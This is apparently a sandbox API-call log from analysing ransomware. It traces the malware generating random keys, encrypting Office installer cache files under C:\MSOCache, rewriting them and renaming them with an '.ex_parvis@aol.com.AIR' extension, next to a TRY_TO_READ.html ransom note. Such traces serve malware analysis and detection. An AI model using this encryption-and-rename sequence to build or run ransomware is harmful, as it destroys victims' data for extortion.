	[0095.332] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0095.332] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0095.333] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0095.333] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0095.334] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b2) returned 0x5febb8
	[0095.334] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10b2) returned 0x5ffc78
	[0095.334] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0095.334] ReadFile (in: hFile=0x498, lpBuffer=0x5febb8, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5febb8*, lpNumberOfBytesRead=0x3a1f778*=0x10b2, lpOverlapped=0x0) returned 1
	[0095.334] SetFilePointer (in: hFile=0x498, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0095.335] WriteFile (in: hFile=0x498, lpBuffer=0x5ffc78*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffc78*, lpNumberOfBytesWritten=0x3a1f778*=0x10b2, lpOverlapped=0x0) returned 1
	[0095.335] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febb8 | out: hHeap=0x540000) returned 1
	[0095.335] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffc78 | out: hHeap=0x540000) returned 1
	[0095.335] CloseHandle (hObject=0x498) returned 1
	[0095.336] GetProcessHeap () returned 0x540000
	[0095.336] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0095.336] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0095.336] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0095.336] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbd88 | out: hHeap=0x540000) returned 1
	[0095.336] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbce0 | out: hHeap=0x540000) returned 1
	[0095.336] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbce0
	[0095.336] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0095.336] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0095.336] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0095.336] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0095.336] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1
	[0095.337] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78
	[0095.337] GetProcessHeap () returned 0x540000
	[0095.337] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x598b60
	[0095.337] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi"
	[0095.337] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0095.337] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0095.339] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0095.339] GetProcessHeap () returned 0x540000
	[0095.339] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0095.339] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1992192) returned 1
	[0095.339] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1e6600
	[0095.339] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0095.339] GetProcessHeap () returned 0x540000
	[0095.339] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0095.339] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0095.339] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0095.342] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0095.342] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0095.342] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1e6600) returned 0x3c20020
	[0095.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1e6600) returned 0x3e10020
	[0095.343] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0095.343] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x1e6600, lpOverlapped=0x0) returned 1
	[0095.433] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da430
	[0095.433] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.433] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.433] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.434] GetLastError () returned 0x0
	[0095.434] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.434] GetLastError () returned 0x0
	[0095.434] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5ed9630, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe5ed9630, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x4655d500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.434] GetLastError () returned 0x0
	[0095.434] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.434] GetLastError () returned 0x0
	[0095.434] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.434] GetLastError () returned 0x0
	[0095.434] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.434] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.434] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.434] GetLastError () returned 0x0
	[0095.435] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.435] GetLastError () returned 0x0
	[0095.435] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7c66670, ftCreationTime.dwHighDateTime=0x1cb0ee5, ftLastAccessTime.dwLowDateTime=0xe7c66670, ftLastAccessTime.dwHighDateTime=0x1cb0ee5, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.435] GetLastError () returned 0x0
	[0095.435] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0x4a6ac100, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.435] GetLastError () returned 0x0
	[0095.435] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.435] GetLastError () returned 0x0
	[0095.435] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.435] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.435] GetLastError () returned 0x0
	[0095.435] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9f11bf0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0095.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.436] GetLastError () returned 0x0
	[0095.436] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1
	[0095.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.436] GetLastError () returned 0x0
	[0095.436] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1
	[0095.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.436] GetLastError () returned 0x0
	[0095.436] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1
	[0095.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0095.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0095.436] GetLastError () returned 0x0
	[0095.436] FindNextFileW (in: hFindFile=0x5da430, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc2c8
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0095.436] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0095.436] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0095.436] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0095.436] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", dwFileAttributes=0x80) returned 1
	[0095.437] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 76
	[0095.437] GetProcessHeap () returned 0x540000
	[0095.437] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0095.437] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml"
	[0095.437] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR"
